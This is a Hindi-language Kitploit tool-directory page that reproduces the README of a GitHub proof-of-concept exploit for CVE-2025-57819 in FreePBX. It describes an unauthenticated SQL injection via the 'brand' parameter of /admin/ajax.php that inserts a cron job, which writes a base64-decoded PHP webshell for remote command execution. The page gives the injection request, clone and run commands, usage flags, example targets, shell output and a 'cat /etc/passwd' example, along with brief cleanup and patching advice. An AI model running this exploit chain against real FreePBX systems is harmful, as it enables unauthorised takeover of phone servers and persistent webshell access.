Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-57819-POC — FreePBX में बिना प्रमाणीकरण के SQL इंजेक्शन से रिमोट कोड निष्पादन (RCE), FreePBX 15 (15.0.66 से कम), 16 (16.0.89 से कम), 17 (17.0.3 से कम)। यह भेद्यता वाणिज्यिक "endpoint" मॉड्यूल में स्थित है, जो उपयोगकर्ता इनपुट के अपर्याप्त फ़िल्टरिंग के कारण, बिना प्रमाणीकरण के हमलावरों को व्यवस्थापक (एडमिन) विशेषाधिकारों को बायपास करने, SQL इंजेक्शन निष्पादित करने और अंततः रिमोट कोड निष्पादन प्राप्त करने की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/neobee714/cve-2025-57819-poc
भेद्यता स्कैनरकोड विश्लेषणशोषणवेब सुरक्षालर्निंग और शिक्षा
GitHubneobee714/cve-2025-57819-poc

CVE-2025-57819-POC

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

FreePBX में बिना प्रमाणीकरण के SQL इंजेक्शन से रिमोट कोड निष्पादन (RCE), FreePBX 15 (15.0.66 से कम), 16 (16.0.89 से कम), 17 (17.0.3 से कम)। यह भेद्यता वाणिज्यिक "endpoint" मॉड्यूल में स्थित है, जो उपयोगकर्ता इनपुट के अपर्याप्त फ़िल्टरिंग के कारण, बिना प्रमाणीकरण के हमलावरों को व्यवस्थापक (एडमिन) विशेषाधिकारों को बायपास करने, SQL इंजेक्शन निष्पादित करने और अंततः रिमोट कोड निष्पादन प्राप्त करने की अनुमति देता है।

1 महीना पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2025-57819 — FreePBX SQL इंजेक्शन → RCE PoC

CVE-2025-57819 FreePBX में एक गंभीर SQL इंजेक्शन भेद्यता है जो एक अनधिकृत हमलावर को SQL इंजेक्शन को क्रॉन जॉब इंजेक्शन के साथ जोड़कर रिमोट कोड निष्पादन प्राप्त करने की अनुमति देती है।

⚠️ अस्वीकरण: यह रिपॉजिटरी केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। इस एक्सप्लॉइट का उन सिस्टमों के विरुद्ध अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध है। लेखक किसी भी दुरुपयोग या क्षति के लिए उत्तरदायी नहीं है।


भेद्यता अवलोकन

फ़ील्डविवरण
CVECVE-2025-57819
प्रभावित उत्पादFreePBX (प्रमाणीकरण-पूर्व)
भेद्यता प्रकारSQL इंजेक्शन (स्टैक्ड क्वेरी)
प्रभावरिमोट कोड निष्पादन (RCE)
हमला वेक्टरनेटवर्क (HTTP GET)
प्रमाणीकरण आवश्यक❌ नहीं

एक्सप्लॉइट श्रृंखला

root@kitploit:~
┌────────────────────────────────────────────────────────────────┐
│ 1. SQL Injection                                               │
│    POST /admin/ajax.php?brand= → stacked query                 │
│    INSERT INTO cron_jobs …                                     │
├────────────────────────────────────────────────────────────────┤
│ 2. Cron Job Injection                                          │
│    Malicious cron job writes base64-decoded PHP webshell       │
│    to /var/www/html/shell.php                                  │
├────────────────────────────────────────────────────────────────┤
│ 3. WebShell Access                                             │
│    GET /shell.php?cmd=<command> → arbitrary code execution     │
└────────────────────────────────────────────────────────────────┘

यह कैसे काम करता है

  1. /admin/ajax.php एंडपॉइंट brand पैरामीटर को उचित सैनिटाइज़ेशन के बिना प्रोसेस करता है, जिससे स्टैक्ड SQL क्वेरी की अनुमति मिलती है।
  2. हमलावर एक INSERT INTO cron_jobs स्टेटमेंट इंजेक्ट करता है जो हर मिनट एक दुर्भावनापूर्ण कमांड शेड्यूल करता है।
  3. क्रॉन जॉब base64-एन्कोडेड PHP वेबशेल को डीकोड करता है और उसे वेब रूट पर लिखता है।
  4. लिखे जाने के बाद, हमलावर वेबशेल के माध्यम से मनमाने सिस्टम कमांड निष्पादित कर सकता है।

त्वरित प्रारंभ

root@kitploit:~
# Clone
git clone [email protected]:Neobee714/CVE-2025-57819-POC.git
cd CVE-2025-57819-POC

# Install dependency
pip install requests

# Basic usage
python exploit.py <target>

# Drop into interactive shell after injection
python exploit.py <target> --shell

# Execute a single command
python exploit.py <target> --cmd "cat /etc/passwd"

उपयोग

root@kitploit:~
usage: exploit.py [-h] [-p PORT] [--shell] [--cmd CMD]
                  [--param PARAM] [--no-wait] [-v]
                  target

CVE-2025-57819 – FreePBX SQLi → Cron → WebShell

positional arguments:
  target                target hostname or IP (with optional scheme)

options:
  -h, --help            show this help message and exit
  -p, --port PORT       port (default: 80/443)
  --shell               drop into interactive shell after injection
  --cmd CMD             execute a single command via the webshell
  --param PARAM         webshell query-string parameter (default: cmd)
  --no-wait             skip the webshell-verification poll
  -v, -vv               increase verbosity (-v info, -vv debug)

उदाहरण

root@kitploit:~
# Target with default HTTP port
python exploit.py connected.htb

# Target with custom port
python exploit.py 10.10.11.100 -p 8080

# Inject, verify, and drop into interactive shell
python exploit.py 10.10.11.100 --shell

# Inject and run a single command
python exploit.py connected.htb --cmd "whoami"

# Skip the verification poll (if you already know the shell is live)
python exploit.py connected.htb --no-wait --cmd "id"

# Verbose output for debugging
python exploit.py connected.htb -vv --shell

इंटरैक्टिव शेल

--shell का उपयोग करने पर, स्क्रिप्ट एक स्यूडो-टर्मिनल में प्रवेश करती है:

root@kitploit:~
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit
[*] Shell session ended.

सत्र समाप्त करने के लिए exit (या Ctrl-C, Ctrl-D) टाइप करें।


मैन्युअल सत्यापन

यदि आप मैन्युअल चरण पसंद करते हैं, तो एक्सप्लॉइट तीन काम करता है:

चरण 1 – क्रॉन जॉब इंजेक्ट करें

root@kitploit:~
GET /admin/ajax.php?module=FreePBX\modules\endpoint\ajax&command=model&template=x&model=model&brand=x'%20%3BINSERT%20INTO%20cron_jobs%20...

चरण 2 – क्रॉन के ट्रिगर होने के लिए ~60 सेकंड प्रतीक्षा करें

इंजेक्टेड क्रॉन जॉब (* * * * *) हर मिनट चलती है और वेबशेल लिखती है।

चरण 3 – वेबशेल तक पहुँचें

root@kitploit:~
GET /shell.php?cmd=id

सफ़ाई

परीक्षण के बाद, वेबशेल और क्रॉन जॉब प्रविष्टि हटाएँ:

root@kitploit:~
DELETE FROM cron_jobs WHERE command LIKE '%base64%';

फिर फाइल सिस्टम से /var/www/html/shell.php हटा दें।


प्रभावित संस्करण

  • विक्रेता पैच से पहले के FreePBX संस्करण
  • वे सिस्टम जहाँ /admin/ajax.php बिना प्रमाणीकरण के पहुँच योग्य है

शमन

  • विक्रेता द्वारा प्रदान किया गया सुरक्षा पैच तुरंत लागू करें
  • FreePBX एडमिन इंटरफ़ेस तक नेटवर्क पहुँच प्रतिबंधित करें
  • सुनिश्चित करें कि FreePBX डेटाबेस उपयोगकर्ता के पास न्यूनतम विशेषाधिकार हों (रक्षा-गहराई)

संदर्भ

  • FreePBX सुरक्षा सलाहकार
  • OWASP SQL इंजेक्शन

लाइसेंस

यह प्रोजेक्ट केवल शैक्षिक और रक्षात्मक सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। इस दस्तावेज़ के शीर्ष पर दिया गया अस्वीकरण देखें।

टूल डाउनलोड करें